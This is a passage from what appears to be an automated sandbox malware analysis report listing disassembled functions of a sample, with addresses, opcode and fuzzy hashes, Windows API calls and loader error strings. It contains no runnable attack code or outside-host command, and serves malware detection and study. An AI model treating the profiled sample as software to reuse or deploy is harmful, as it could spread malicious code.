                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: -$:$f$p$p
                                                              • API String ID: 3215553584-2013873522
                                                              • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                              • Instruction ID: 171ece82a85c632ae3cf06dfb3decd6baba0ac50736b311000544eaa46118e52
                                                              • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                              • Instruction Fuzzy Hash: C012B571E0C24386FB24DB15D0542797692FB8879CF944136D6AA87AE8FF3CE590CB04
                                                              Function 00007FF6FB1F02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: f$f$p$p$f
                                                              • API String ID: 3215553584-1325933183
                                                              • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                              • Instruction ID: e6ac04964fe0ad5565ba27a5d55502366ca34db5c8ade0f5475fa164ea720470
                                                              • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                              • Instruction Fuzzy Hash: EF129462E0C14386FB20DF54E0587B97292FB88758F984135D6AA876E4FF7DE980CB50
                                                              Function 00007FF6FB1E1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2030045667-3659356012
                                                              • Opcode ID: 6c2c96a29d60f432f2b448254d07b01eb9fab63d38ba2328369ba170bbdd7169
                                                              • Instruction ID: 6f7834727ce1eb4a92e1931a37700c06773c20887ed0693cc16d563ca2b5f628
                                                              • Opcode Fuzzy Hash: 6c2c96a29d60f432f2b448254d07b01eb9fab63d38ba2328369ba170bbdd7169
                                                              • Instruction Fuzzy Hash: 85417C22E0864382FB20DB22A9545BEA390BB48BC8F444431ED6E87BF5FE2CF4548740
                                                              Function 00007FF6FB1E1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2030045667-3659356012
                                                              • Opcode ID: 7a6b146adfcb98e650bee18aa77db2fbb1ea6c7dd5ba6714b17be4e0a6b4b0dd
                                                              • Instruction ID: 84ecfcd80d7305998b3be636ada93a78a111f2fbd3bdddcd1f2a45b457d3d257
                                                              • Opcode Fuzzy Hash: 7a6b146adfcb98e650bee18aa77db2fbb1ea6c7dd5ba6714b17be4e0a6b4b0dd
                                                              • Instruction Fuzzy Hash: 69414722E0864382FB20DB15A9505BE63A0AF4DBD8F545432DA6E87AF5FE7CF5518700
                                                              Function 00007FF6FB1EDD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                              • Instruction ID: 794c82b303f5e3d5b7cc6c91b9e4080ab274db0d023e0e03f98114b72fe0fbab
                                                              • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                              • Instruction Fuzzy Hash: D8D14C32E087468AEB60DB6594403AE77A0FB59B9CF100135EA6D97FA5EF38F491C740
                                                              Function 00007FF6FB1ECFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED06D
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED07B
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED0A5
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED113
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED11F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                              • Instruction ID: a5c4d9d5d5bab91ca0f4aeb956cdfdd91acae7b12b79009de08f85f301f8d72b
                                                              • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                              • Instruction Fuzzy Hash: 43317A35B1AA4B81EB21DB12A80467D6294BB0CBA8F5A0535DD3D87BE0FE3CF4468300
                                                              Function 00007FF6FB1FA460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                              • Instruction ID: dc7fb6c9b439329b3f1eebeaee82eec497c0604bf2e99167f223d5535a857021
                                                              • Opcode Fuzzy Hash: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                              • Instruction Fuzzy Hash: 72214C21E5C24342FB68E721965917D61A29F8C7F8F184734E93EC6AF6FE2CA441C701
                                                              Function 00007FF6FB20707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                              • Instruction ID: 7b53d6fa7f3dbf827f2a487b1539fd8aa51851257c78a003142cb659cb094a80
                                                              • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                              • Instruction Fuzzy Hash: DE115121A18A4786E7609B56E958339A2A0FB9CBE4F045234EA6EC77F4EF7CD414C740
                                                              Function 00007FF6FB1E81F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E821D
                                                              • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E827A
                                                                • Part of subcall function 00007FF6FB1E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FB1E3FA4,00000000,00007FF6FB1E1925), ref: 00007FF6FB1E86E9
                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E8305
                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E8364
                                                              • FreeLibrary.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E8375
                                                              • FreeLibrary.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E838A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                              • String ID:
                                                              • API String ID: 3462794448-0
                                                              • Opcode ID: 639de59220823cace7c77af6f37b7d772b01f3b75ea0781fa3cc2fa807537d27
                                                              • Instruction ID: 15b841edd0ea822cfbb58ef6fca21af6a6028b9fa1b58d3e308299b92fd91964
                                                              • Opcode Fuzzy Hash: 639de59220823cace7c77af6f37b7d772b01f3b75ea0781fa3cc2fa807537d27
                                                              • Instruction Fuzzy Hash: 7C415E62E19A8381EB70DB11A5442AE6394FB8DBC8F444135DF6D97BE9EE3CE501C700
                                                              Function 00007FF6FB1FA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA5E7
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA61D
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA64A
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA65B
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA66C
                                                              • SetLastError.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA687
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                              • Instruction ID: db631e8db13fb1a6b3ccbb68a75881381014553465a5cd4151cc284b9ed3eefa
                                                              • Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                              • Instruction Fuzzy Hash: 86114A21E5C24342FB58E7619A5917D22A25F8C7B8F045734D83EC66F6FE2CB801C701
                                                              Function 00007FF6FB1E2300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                              • String ID: Unhandled exception in script
                                                              • API String ID: 3081866767-2699770090
                                                              • Opcode ID: 2f02a126994589ece2bf0b221661227d336c2ada993d2ff489732679099e34b6
                                                              • Instruction ID: 78ab12e641600f7cf6fd2a0d0f3732bdc9268598fceeba26a7463725195367fa
                                                              • Opcode Fuzzy Hash: 2f02a126994589ece2bf0b221661227d336c2ada993d2ff489732679099e34b6
                                                              • Instruction Fuzzy Hash: 18311F76A0968385EB20EF61E9652F96364FF8D788F440135EA5E86BA5EF3CD104C700
                                                              Function 00007FF6FB1E2760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ByteCharMultiWide
                                                              • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                              • API String ID: 1878133881-640379615
                                                              • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                              • Instruction ID: af085a4454aabcc04595b0d90461438e07fab35b77b42f48f0c653e33665c215
                                                              • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                              • Instruction Fuzzy Hash: 15212172A1868781E730DB10F4617EE6364FB88788F401136E69D93AE9EF7CE655C740
                                                              Function 00007FF6FB1F8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                              • Instruction ID: 9a6ff5160032f93f13c2f460ae862feda53ae65771ff672f3f30334ae9f44df5
                                                              • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                              • Instruction Fuzzy Hash: 15F09625B1970381EB209B24E49837D5320AF8DBA5F581635D57EC61F4EF3DD149D310
                                                              Function 00007FF6FB208678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction ID: 620594066fdd09bc23555b06cb731c534d9d0e903a29610f9efb70cb57adf806
                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction Fuzzy Hash: B9118F36E58A0341F7541128D67537721406F6D3F4F662634EA7ECE6FAEE2CA8818710
                                                              Function 00007FF6FB1FA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA6BF
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA6DE
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA706
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA717
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA728
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                              • Instruction ID: 4ccb9ce30468c37a51903fa91ec71163c5e46ceb78926bf98ca762b83b7ede2f
                                                              • Opcode Fuzzy Hash: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                              • Instruction Fuzzy Hash: 7A113721F5C24342FB58E3259A5557A21A26F9C3B8E084334E83EC66F6FE2DE941C701
                                                              Function 00007FF6FB1FA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
